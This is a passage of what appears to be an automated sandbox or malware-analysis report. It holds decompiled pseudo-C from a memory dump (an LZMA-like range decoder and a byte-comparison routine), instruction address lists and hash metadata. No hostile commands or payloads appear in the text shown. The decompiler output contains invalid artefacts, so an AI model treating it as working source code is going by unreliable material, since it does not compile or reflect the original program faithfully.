                                                                                                                                                      								if(_t323 >= _t198) {
                                                                                                                                                      									_t296 = _t296 - _t198;
                                                                                                                                                      									_t323 = _t323 - _t198;
                                                                                                                                                      									_t285 = _t285 + _t285 + 1;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t285 = _t285 + _t285;
                                                                                                                                                      									_t321 = _t321 ^ _v4;
                                                                                                                                                      									_t296 = _t198;
                                                                                                                                                      								}
                                                                                                                                                      							} while (_t285 < 0x100);
                                                                                                                                                      							goto L31;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t286 = 1;
                                                                                                                                                      							do {
                                                                                                                                                      								_t322 =  *(_v16 + _t286 * 2) & 0x0000ffff;
                                                                                                                                                      								if(_t296 >= 0x1000000) {
                                                                                                                                                      									goto L15;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t205 = _a4;
                                                                                                                                                      									if(_t205 >= _v20) {
                                                                                                                                                      										goto L2;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t296 = _t296 << 8;
                                                                                                                                                      										_t323 = _t323 << 0x00000008 |  *_t205 & 0x000000ff;
                                                                                                                                                      										_a4 =  &(_t205[1]);
                                                                                                                                                      										goto L15;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								goto L113;
                                                                                                                                                      								L15:
                                                                                                                                                      								_t204 = (_t296 >> 0xb) * _t322;
                                                                                                                                                      								if(_t323 >= _t204) {
                                                                                                                                                      									_t296 = _t296 - _t204;
                                                                                                                                                      									_t323 = _t323 - _t204;
                                                                                                                                                      									_t286 = _t286 + _t286 + 1;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t296 = _t204;
                                                                                                                                                      									_t286 = _t286 + _t286;
                                                                                                                                                      								}
                                                                                                                                                      							} while (_t286 < 0x100);
                                                                                                                                                      							L31:
                                                                                                                                                      							_v8 = 1;
                                                                                                                                                      							L32:
                                                                                                                                                      							_t173 = _a4;
                                                                                                                                                      							L33:
                                                                                                                                                      							if(_t295 >= 0x1000000 || _t173 < _v20) {
                                                                                                                                                      								return _v8;
                                                                                                                                                      							} else {
                                                                                                                                                      								goto L2;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_t207 = _a4;
                                                                                                                                                      					if(_t207 < _v20) {
                                                                                                                                                      						_t288 = _t288 << 8;
                                                                                                                                                      						_t323 = _t323 << 0x00000008 |  *_t207 & 0x000000ff;
                                                                                                                                                      						_a4 =  &(_t207[1]);
                                                                                                                                                      						goto L4;
                                                                                                                                                      					} else {
                                                                                                                                                      						L2:
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L113:
                                                                                                                                                      			}
                                                                                                                                                      0x10009e3b
                                                                                                                                                      0x10009e3b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009e40
                                                                                                                                                      0x10009e46
                                                                                                                                                      0x10009e64
                                                                                                                                                      0x10009e6d
                                                                                                                                                      0x10009e72
                                                                                                                                                      0x10009e7a
                                                                                                                                                      0x10009e7c
                                                                                                                                                      0x10009e7e
                                                                                                                                                      0x10009e74
                                                                                                                                                      0x10009e74
                                                                                                                                                      0x10009e76
                                                                                                                                                      0x10009e76
                                                                                                                                                      0x10009e82
                                                                                                                                                      0x10009e88
                                                                                                                                                      0x10009e92
                                                                                                                                                      0x10009e99
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009e9f
                                                                                                                                                      0x10009ea2
                                                                                                                                                      0x10009ea4
                                                                                                                                                      0x10009ea4
                                                                                                                                                      0x10009ea9
                                                                                                                                                      0x10009ead
                                                                                                                                                      0x10009eb3
                                                                                                                                                      0x10009eb7
                                                                                                                                                      0x10009ec0
                                                                                                                                                      0x10009ec6
                                                                                                                                                      0x10009ecb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009ecd
                                                                                                                                                      0x10009ecd
                                                                                                                                                      0x10009ed5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009edb
                                                                                                                                                      0x10009ee1
                                                                                                                                                      0x10009ee4
                                                                                                                                                      0x10009ee6
                                                                                                                                                      0x10009ee9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009ee9
                                                                                                                                                      0x10009ed5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009eed
                                                                                                                                                      0x10009ef2
                                                                                                                                                      0x10009ef7
                                                                                                                                                      0x10009eff
                                                                                                                                                      0x10009f01
                                                                                                                                                      0x10009f03
                                                                                                                                                      0x10009ef9
                                                                                                                                                      0x10009ef9
                                                                                                                                                      0x10009efb
                                                                                                                                                      0x10009efb
                                                                                                                                                      0x10009f07
                                                                                                                                                      0x10009f0c
                                                                                                                                                      0x10009f12
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009f18
                                                                                                                                                      0x10009f1c
                                                                                                                                                      0x10009f22
                                                                                                                                                      0x10009f26
                                                                                                                                                      0x10009f3d
                                                                                                                                                      0x10009f41
                                                                                                                                                      0x10009f44
                                                                                                                                                      0x10009f4a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009f4c
                                                                                                                                                      0x10009f4e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009f54
                                                                                                                                                      0x10009f5a
                                                                                                                                                      0x10009f5d
                                                                                                                                                      0x10009f5f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009f5f
                                                                                                                                                      0x10009f4e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009f62
                                                                                                                                                      0x10009f62
                                                                                                                                                      0x10009f70
                                                                                                                                                      0x10009f72
                                                                                                                                                      0x10009f72
                                                                                                                                                      0x10009f77
                                                                                                                                                      0x10009f7b
                                                                                                                                                      0x10009f7f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009f28
                                                                                                                                                      0x10009f34
                                                                                                                                                      0x10009f87
                                                                                                                                                      0x10009f87
                                                                                                                                                      0x10009f8c
                                                                                                                                                      0x10009f90
                                                                                                                                                      0x10009f92
                                                                                                                                                      0x10009f9c
                                                                                                                                                      0x10009fa0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009fa2
                                                                                                                                                      0x10009faa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009fb0
                                                                                                                                                      0x10009fb0
                                                                                                                                                      0x10009fba
                                                                                                                                                      0x10009fbd
                                                                                                                                                      0x10009fbf
                                                                                                                                                      0x10009fc2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009fc2
                                                                                                                                                      0x10009faa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009fc6
                                                                                                                                                      0x10009fcb
                                                                                                                                                      0x10009fd0
                                                                                                                                                      0x10009fda
                                                                                                                                                      0x10009fdc
                                                                                                                                                      0x10009fde
                                                                                                                                                      0x10009fe0
                                                                                                                                                      0x10009fd2
                                                                                                                                                      0x10009fd2
                                                                                                                                                      0x10009fd4
                                                                                                                                                      0x10009fd6
                                                                                                                                                      0x10009fd6
                                                                                                                                                      0x10009fe2
                                                                                                                                                      0x10009fe2
                                                                                                                                                      0x10009fe2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009fe9
                                                                                                                                                      0x10009f26
                                                                                                                                                      0x10009f12
                                                                                                                                                      0x10009e8a
                                                                                                                                                      0x10009e8a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009e8a
                                                                                                                                                      0x10009e48
                                                                                                                                                      0x10009e4c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009e52
                                                                                                                                                      0x10009e58
                                                                                                                                                      0x10009e5b
                                                                                                                                                      0x10009e60
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009e60
                                                                                                                                                      0x10009e4c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009e46
                                                                                                                                                      0x10009e40
                                                                                                                                                      0x10009d9e
                                                                                                                                                      0x10009da2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009da8
                                                                                                                                                      0x10009dae
                                                                                                                                                      0x10009db1
                                                                                                                                                      0x10009db6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009db6
                                                                                                                                                      0x10009da2
                                                                                                                                                      0x10009d9c
                                                                                                                                                      0x10009c02
                                                                                                                                                      0x10009c06
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009c0c
                                                                                                                                                      0x10009c12
                                                                                                                                                      0x10009c15
                                                                                                                                                      0x10009c17
                                                                                                                                                      0x10009c1a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10009c1a
                                                                                                                                                      0x10009c06
                                                                                                                                                      0x10009a69
                                                                                                                                                      0x10009a69
                                                                                                                                                      0x10009a78
                                                                                                                                                      0x10009a7c

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e0856241cb6bbf71926997529d1bf78259062796160ea0e3547fab56752f16d4
                                                                                                                                                      • Instruction ID: 78895ff4ef9897740547fc240ec4193322f39ffc3cf547d0009f287671033df6
                                                                                                                                                      • Opcode Fuzzy Hash: e0856241cb6bbf71926997529d1bf78259062796160ea0e3547fab56752f16d4
                                                                                                                                                      • Instruction Fuzzy Hash: 60024A72A043518BE708CE28C4D426DBBE2FBC4394F164A3EE89697788D774E945CBD1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1000C483(void* __eax, void* __ecx) {
                                                                                                                                                      				void* _t196;
                                                                                                                                                      				signed int _t197;
                                                                                                                                                      				void* _t200;
                                                                                                                                                      				signed char _t206;
                                                                                                                                                      				signed char _t207;
                                                                                                                                                      				signed char _t208;
                                                                                                                                                      				signed char _t210;
                                                                                                                                                      				signed char _t211;
                                                                                                                                                      				signed int _t216;
                                                                                                                                                      				signed int _t316;
                                                                                                                                                      				void* _t319;
                                                                                                                                                      				void* _t321;
                                                                                                                                                      				void* _t323;
                                                                                                                                                      				void* _t325;
                                                                                                                                                      				void* _t327;
                                                                                                                                                      				void* _t330;
                                                                                                                                                      				void* _t332;
                                                                                                                                                      				void* _t334;
                                                                                                                                                      				void* _t337;
                                                                                                                                                      				void* _t339;
                                                                                                                                                      				void* _t341;
                                                                                                                                                      				void* _t344;
                                                                                                                                                      				void* _t346;
                                                                                                                                                      				void* _t348;
                                                                                                                                                      				void* _t351;
                                                                                                                                                      				void* _t353;
                                                                                                                                                      				void* _t355;
                                                                                                                                                      				void* _t358;
                                                                                                                                                      				void* _t360;
                                                                                                                                                      				void* _t362;
                                                                                                                                                      
                                                                                                                                                      				_t200 = __ecx;
                                                                                                                                                      				_t196 = __eax;
                                                                                                                                                      				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
                                                                                                                                                      					_t316 = 0;
                                                                                                                                                      					L17:
                                                                                                                                                      					if(_t316 != 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					_t206 =  *(_t196 - 0x1b);
                                                                                                                                                      					if(_t206 ==  *(_t200 - 0x1b)) {
                                                                                                                                                      						_t316 = 0;
                                                                                                                                                      						L28:
                                                                                                                                                      						if(_t316 != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						_t207 =  *(_t196 - 0x17);
                                                                                                                                                      						if(_t207 ==  *(_t200 - 0x17)) {
                                                                                                                                                      							_t316 = 0;
                                                                                                                                                      							L39:
                                                                                                                                                      							if(_t316 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							_t208 =  *(_t196 - 0x13);
                                                                                                                                                      							if(_t208 ==  *(_t200 - 0x13)) {
                                                                                                                                                      								_t316 = 0;
                                                                                                                                                      								L50:
                                                                                                                                                      								if(_t316 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
                                                                                                                                                      									_t316 = 0;
                                                                                                                                                      									L61:
                                                                                                                                                      									if(_t316 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									_t210 =  *(_t196 - 0xb);
                                                                                                                                                      									if(_t210 ==  *(_t200 - 0xb)) {
                                                                                                                                                      										_t316 = 0;
                                                                                                                                                      										L72:
                                                                                                                                                      										if(_t316 != 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										}
                                                                                                                                                      										_t211 =  *(_t196 - 7);
                                                                                                                                                      										if(_t211 ==  *(_t200 - 7)) {
                                                                                                                                                      											_t316 = 0;
                                                                                                                                                      											L83:
                                                                                                                                                      											if(_t316 != 0) {
                                                                                                                                                      												goto L1;
                                                                                                                                                      											}
                                                                                                                                                      											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
                                                                                                                                                      											if(_t319 == 0) {
                                                                                                                                                      												L5:
                                                                                                                                                      												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
                                                                                                                                                      												if(_t321 == 0) {
                                                                                                                                                      													L3:
                                                                                                                                                      													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
                                                                                                                                                      													if(_t197 != 0) {
                                                                                                                                                      														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
                                                                                                                                                      													}
                                                                                                                                                      													L2:
                                                                                                                                                      													return _t197;
                                                                                                                                                      												}
                                                                                                                                                      												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                                                                                      												if(_t216 != 0) {
                                                                                                                                                      													L86:
                                                                                                                                                      													_t197 = _t216;
                                                                                                                                                      													goto L2;
                                                                                                                                                      												} else {
                                                                                                                                                      													goto L3;
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
                                                                                                                                                      											if(_t216 == 0) {
                                                                                                                                                      												goto L5;
                                                                                                                                                      											}
                                                                                                                                                      											goto L86;
                                                                                                                                                      										}
                                                                                                                                                      										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
                                                                                                                                                      										if(_t323 == 0) {
                                                                                                                                                      											L76:
                                                                                                                                                      											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
                                                                                                                                                      											if(_t325 == 0) {
                                                                                                                                                      												L78:
                                                                                                                                                      												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
                                                                                                                                                      												if(_t327 == 0) {
                                                                                                                                                      													L80:
                                                                                                                                                      													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
                                                                                                                                                      													if(_t316 != 0) {
                                                                                                                                                      														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                                                      													}
                                                                                                                                                      													goto L83;
                                                                                                                                                      												}
                                                                                                                                                      												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                                                                                                                                                      												if(_t316 != 0) {
                                                                                                                                                      													goto L1;
                                                                                                                                                      												}
                                                                                                                                                      												goto L80;
                                                                                                                                                      											}
                                                                                                                                                      											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                                                                                      											if(_t316 != 0) {
                                                                                                                                                      												goto L1;
                                                                                                                                                      											}
                                                                                                                                                      											goto L78;
                                                                                                                                                      										}
                                                                                                                                                      										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                                                                                      										if(_t316 != 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										}
                                                                                                                                                      										goto L76;
                                                                                                                                                      									}
                                                                                                                                                      									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
                                                                                                                                                      									if(_t330 == 0) {
                                                                                                                                                      										L65:
                                                                                                                                                      										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
                                                                                                                                                      										if(_t332 == 0) {
                                                                                                                                                      											L67:
                                                                                                                                                      											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
                                                                                                                                                      											if(_t334 == 0) {
                                                                                                                                                      												L69:
                                                                                                                                                      												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
                                                                                                                                                      												if(_t316 != 0) {
                                                                                                                                                      													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                                                      												}
                                                                                                                                                      												goto L72;
                                                                                                                                                      											}
                                                                                                                                                      											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                                                                                                                                                      											if(_t316 != 0) {
                                                                                                                                                      												goto L1;
                                                                                                                                                      											}
                                                                                                                                                      											goto L69;
                                                                                                                                                      										}
                                                                                                                                                      										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                                                                                                                                                      										if(_t316 != 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										}
                                                                                                                                                      										goto L67;
                                                                                                                                                      									}
                                                                                                                                                      									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                                                                                                                                                      									if(_t316 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L65;
                                                                                                                                                      								}
                                                                                                                                                      								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
                                                                                                                                                      								if(_t337 == 0) {
                                                                                                                                                      									L54:
                                                                                                                                                      									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
                                                                                                                                                      									if(_t339 == 0) {
                                                                                                                                                      										L56:
                                                                                                                                                      										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
                                                                                                                                                      										if(_t341 == 0) {
                                                                                                                                                      											L58:
                                                                                                                                                      											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
                                                                                                                                                      											if(_t316 != 0) {
                                                                                                                                                      												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                                                      											}
                                                                                                                                                      											goto L61;
                                                                                                                                                      										}
                                                                                                                                                      										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
                                                                                                                                                      										if(_t316 != 0) {
                                                                                                                                                      											goto L1;
                                                                                                                                                      										}
                                                                                                                                                      										goto L58;
                                                                                                                                                      									}
                                                                                                                                                      									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                                                                                                                                                      									if(_t316 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L56;
                                                                                                                                                      								}
                                                                                                                                                      								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                                                                                                                                                      								if(_t316 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L54;
                                                                                                                                                      							}
                                                                                                                                                      							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
                                                                                                                                                      							if(_t344 == 0) {
                                                                                                                                                      								L43:
                                                                                                                                                      								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
                                                                                                                                                      								if(_t346 == 0) {
                                                                                                                                                      									L45:
                                                                                                                                                      									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
                                                                                                                                                      									if(_t348 == 0) {
                                                                                                                                                      										L47:
                                                                                                                                                      										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
                                                                                                                                                      										if(_t316 != 0) {
                                                                                                                                                      											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                                                      										}
                                                                                                                                                      										goto L50;
                                                                                                                                                      									}
                                                                                                                                                      									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
                                                                                                                                                      									if(_t316 != 0) {
                                                                                                                                                      										goto L1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L47;
                                                                                                                                                      								}
                                                                                                                                                      								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                                                                                                                                                      								if(_t316 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L45;
                                                                                                                                                      							}
                                                                                                                                                      							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                                                                                                                                                      							if(_t316 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L43;
                                                                                                                                                      						}
                                                                                                                                                      						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
                                                                                                                                                      						if(_t351 == 0) {
                                                                                                                                                      							L32:
                                                                                                                                                      							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
                                                                                                                                                      							if(_t353 == 0) {
                                                                                                                                                      								L34:
                                                                                                                                                      								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
                                                                                                                                                      								if(_t355 == 0) {
                                                                                                                                                      									L36:
                                                                                                                                                      									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
                                                                                                                                                      									if(_t316 != 0) {
                                                                                                                                                      										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                                                      									}
                                                                                                                                                      									goto L39;
                                                                                                                                                      								}
                                                                                                                                                      								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
                                                                                                                                                      								if(_t316 != 0) {
                                                                                                                                                      									goto L1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L36;
                                                                                                                                                      							}
                                                                                                                                                      							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                                                                                                                                                      							if(_t316 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L34;
                                                                                                                                                      						}
                                                                                                                                                      						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                                                                                                                                                      						if(_t316 != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						goto L32;
                                                                                                                                                      					}
                                                                                                                                                      					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
                                                                                                                                                      					if(_t358 == 0) {
                                                                                                                                                      						L21:
                                                                                                                                                      						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
                                                                                                                                                      						if(_t360 == 0) {
                                                                                                                                                      							L23:
                                                                                                                                                      							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
                                                                                                                                                      							if(_t362 == 0) {
                                                                                                                                                      								L25:
                                                                                                                                                      								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
                                                                                                                                                      								if(_t316 != 0) {
                                                                                                                                                      									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L28;
                                                                                                                                                      							}
                                                                                                                                                      							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
                                                                                                                                                      							if(_t316 != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L25;
                                                                                                                                                      						}
                                                                                                                                                      						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
                                                                                                                                                      						if(_t316 != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						goto L23;
                                                                                                                                                      					}
                                                                                                                                                      					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
                                                                                                                                                      					if(_t316 != 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					goto L21;
                                                                                                                                                      				} else {
                                                                                                                                                      					__edx =  *(__ecx - 0x1f) & 0x000000ff;
                                                                                                                                                      					__esi =  *(__eax - 0x1f) & 0x000000ff;
                                                                                                                                                      					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                                                                                                                                                      					if(__esi == 0) {
                                                                                                                                                      						L10:
                                                                                                                                                      						__esi =  *(__eax - 0x1e) & 0x000000ff;
                                                                                                                                                      						__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                                                                                      						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                                                                                      						if(__esi == 0) {
                                                                                                                                                      							L12:
                                                                                                                                                      							__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                                                                                      							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                                                      							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                                                      							if(__esi == 0) {
                                                                                                                                                      								L14:
                                                                                                                                                      								__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                                                      								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                                                      								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                                                      								if(__esi != 0) {
                                                                                                                                                      									0 = 0 | __esi > 0x00000000;
                                                                                                                                                      									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      								}
                                                                                                                                                      								goto L17;
                                                                                                                                                      							}
                                                                                                                                                      							0 = 0 | __esi > 0x00000000;
                                                                                                                                                      							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      							__esi = __edx;
                                                                                                                                                      							if(__edx != 0) {
                                                                                                                                                      								goto L1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L14;
                                                                                                                                                      						}
                                                                                                                                                      						0 = 0 | __esi > 0x00000000;
                                                                                                                                                      						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      						__esi = __edx;
                                                                                                                                                      						if(__edx != 0) {
                                                                                                                                                      							goto L1;
                                                                                                                                                      						}
                                                                                                                                                      						goto L12;
                                                                                                                                                      					}
                                                                                                                                                      					0 = 0 | __esi > 0x00000000;
                                                                                                                                                      					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                                      					__esi = __edx;
                                                                                                                                                      					if(__edx != 0) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					goto L10;
                                                                                                                                                      				}
                                                                                                                                                      				L1:
                                                                                                                                                      				_t197 = _t316;
                                                                                                                                                      				goto L2;
                                                                                                                                                      			}

































                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c843
                                                                                                                                                      0x1000c81e
                                                                                                                                                      0x1000c822
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c822
                                                                                                                                                      0x1000c7fd
                                                                                                                                                      0x1000c801
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c801
                                                                                                                                                      0x1000c75f
                                                                                                                                                      0x1000c761
                                                                                                                                                      0x1000c778
                                                                                                                                                      0x1000c780
                                                                                                                                                      0x1000c782
                                                                                                                                                      0x1000c799
                                                                                                                                                      0x1000c7a1
                                                                                                                                                      0x1000c7a3
                                                                                                                                                      0x1000c7ba
                                                                                                                                                      0x1000c7c2
                                                                                                                                                      0x1000c7c4
                                                                                                                                                      0x1000c7d1
                                                                                                                                                      0x1000c7d1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c7c4
                                                                                                                                                      0x1000c7b0
                                                                                                                                                      0x1000c7b4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c7b4
                                                                                                                                                      0x1000c78f
                                                                                                                                                      0x1000c793
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000c793
                                                                                                                                                      0x1000c76e
                                                                                                                                                      0x1000c772
                                                                                                                                                      0x00000000
